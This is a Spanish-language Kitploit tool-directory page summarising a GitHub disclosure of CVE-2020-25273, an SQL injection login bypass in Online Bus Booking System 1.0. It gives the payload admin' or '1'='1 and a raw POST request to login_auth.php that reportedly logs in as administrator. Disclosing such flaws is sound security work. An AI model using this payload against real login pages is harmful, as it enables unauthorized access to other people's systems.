Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-25273 — Online Bus Booking System 1.0, hay un bypass de autenticación en la pantalla de inicio de sesión de administrador en admin.php mediante inyección SQL en el nombre de usuario o la contraseña. | Kitploit
Herramientas/GitHubGitHub/jonathanrey87/cve-2020-25273
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAutenticaciónAprendizaje y Educación
GitHubjonathanrey87/cve-2020-25273

CVE-2020-25273

Online Bus Booking System 1.0, hay un bypass de autenticación en la pantalla de inicio de sesión de administrador en admin.php mediante inyección SQL en el nombre de usuario o la contraseña.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 5 añosAún no revisado

CVE-2020-25273

Online Bus Booking System 1.0, existe una omisión de autenticación en la pantalla de inicio de sesión de administrador en admin.php mediante inyección SQL en el nombre de usuario o la contraseña.

#Vendor - SourceCodester

#Product -https://www.sourcecodester.com/php/14438/online-bus-booking-system-project-using-phpmysql.html V 1.0

#Vulnerability Type - Omisión de autenticación

#Affected Component - bus_booking/admin.php

#Attack Type- Local

#Privilege Escalation - true

#Impact Code execution - true

Vector de ataque

  1. Vaya al panel de inicio de sesión de administrador e intente omitirlo.

  2. En el payload de la solicitud, establezca

    username : admin' or '1'='1

    password : admin' or '1'='1


POST /bus_booking/login_auth.php HTTP/1.1

Cookie: PHPSESSID=5d6832eeb2a8dfd424c1b6dcd73745a0

username=admin'+or+'1'%3D'1&password=admin'+or+'1'%3D'1


Se ha iniciado sesión correctamente en el panel de administración.

Descargar herramienta